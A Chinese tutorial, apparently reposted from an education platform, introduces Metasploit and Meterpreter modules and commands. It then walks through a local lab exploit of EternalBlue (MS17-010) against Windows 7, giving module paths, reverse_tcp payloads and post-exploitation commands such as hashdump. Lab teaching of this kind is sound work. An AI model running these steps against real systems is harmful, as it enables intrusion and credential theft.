meterpeter基础及永恒之蓝漏洞利用

admin 2024年4月22日07:12:57评论2 views字数 1921阅读6分24秒阅读模式

扫码领资料

获网安教程

meterpeter基础及永恒之蓝漏洞利用

meterpeter基础及永恒之蓝漏洞利用
本文由掌控安全学院 - wangshaoyu  投稿

meterpeter基础知识

meterpeter为渗透测试框架,主要用于后渗透模块
后渗透:拿到shell后进行的操作(远程,权限维持,入侵痕迹清除,上机关闭杀毒软件)

msf能干什么

相当于一个漏洞库(信息收集,漏洞检测,漏洞利用,payload,shellcode:攻击载荷,poc,exp,病毒木马文件生成)
前提:已知软件漏洞,专业漏洞攻击工具
一般用来打nday(例:永恒之蓝,心脏滴血),内网中较多(医院,银行)

开启msf

开启数据库service postgresql
初始化msf数据库msfdb init
开启msfmsfconsole
查看数据库连接状态(在msf中使用)db_status

msf模块介绍

Auxiliary—辅助模块

进行前期的信息收集(端口开放情况,主机存活情况,服务识别)
命名:功能/服务/名称
使用:show auxiliary
主机发现auxiliary/scanner/discovery/arp_sweep
smb服务扫描auxiliary/scanner/smb/smbversion(文件共享445)
端口扫描auxiliary/scanner/portscan/syn
远程桌面服务扫描auxiliary/scanner/rdp/rdp_scanner(windows远程桌面3389)
ssh主机扫描auxiliary/scanner/ssh/ssh_version(linux远程桌面22)

Exploits(exp)—攻击模块

多用于漏洞利用(系统攻击getshell,RCE),对目标网站发动攻击
命名:操作系统/服务/名称
使用:show exploits
ms17_010exploits/windows/smb/ms17_010_eternalblue
cve-2019-0709(远程桌面协议命令执行漏洞)exploits/windows/rdp/cve-2019-0708_bluekeep_rce

Payload(poc)—攻击载荷模块

维持系统之间的通信,一般多用于漏洞验证,证明漏洞是否存在
命名:操作系统/类型/名称
windowspayload/windows/x64/meterpeter/reverse_tcp
linuxpayload/linux/armle/meterpeter/bind_tcp
androidpayload/android/meterpeter_reverse_tcp
OSXpayload/osx/x64/meterpeter_reverse_tcp

Post—后渗透模块

收集更多信息或进一步访问被利用的目标系统
开启远程桌面post/windows/manage/enable_rdp
查看Windows安装的补丁post/windows/gather/enum_patches

msf基础指令

帮助菜单:help或/?
退出msf控制台:exit
返回上一级:back
显示一个或多个模块的信息:info
显示所给类型的模块:show
将当前操作在后台运行:background
使用所选择的模块:use
设置选项:set
取消设置选项:unset
会话:sessions

永恒之蓝的攻击

搜索相关模块
设置模块
查看选项
配置攻击载荷
设置目标ip和攻击ip
开始攻击

拿到shell后的操作

查看用户权限:getuid
获取hash密码:hashdump
上传文件:upload 文件名
执行文件:execute -f notepad.exe
获取屏幕截图:sereenshot

本地靶场(永恒之蓝漏洞)

搭配环境

攻击者:kali(192.168.75.186)
被攻击者:windows7(192.168.75.227)
确保两台主机能联网且能互相ping通

meterpeter基础及永恒之蓝漏洞利用

meterpeter基础及永恒之蓝漏洞利用

win7的防火墙要是关闭的

meterpeter基础及永恒之蓝漏洞利用

开始攻击

打开msf

meterpeter基础及永恒之蓝漏洞利用

搜索永恒之蓝漏洞(ms17-010)
search ms17-010

meterpeter基础及永恒之蓝漏洞利用

我们先使用第二个模板(根据提示,此时的payload已经设置为默认的payload,我们后期可以不用去重复设置)
use 1或use exploit/windows/smb/ms17_010_psexec

meterpeter基础及永恒之蓝漏洞利用

查看选项,required中yes为必须设置的项(rhost为被攻击主机)
show options

meterpeter基础及永恒之蓝漏洞利用

设置被攻击主机的ip和端口

meterpeter基础及永恒之蓝漏洞利用

run一下,发现只能验证漏洞存在,不能进行攻击

meterpeter基础及永恒之蓝漏洞利用

可以换一下攻击载荷,使用第一个,将参数进行配置

meterpeter基础及永恒之蓝漏洞利用

run一下,拿到权限

meterpeter基础及永恒之蓝漏洞利用

meterpeter基础及永恒之蓝漏洞利用

此时输入shell,查看是否能拿到shell,成功
meterpeter基础及永恒之蓝漏洞利用

.

meterpeter基础及永恒之蓝漏洞利用

原文始发于微信公众号(掌控安全EDU):meterpeter基础及永恒之蓝漏洞利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日07:12:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   meterpeter基础及永恒之蓝漏洞利用https://cn-sec.com/archives/2577612.html

发表评论

匿名网友 填写信息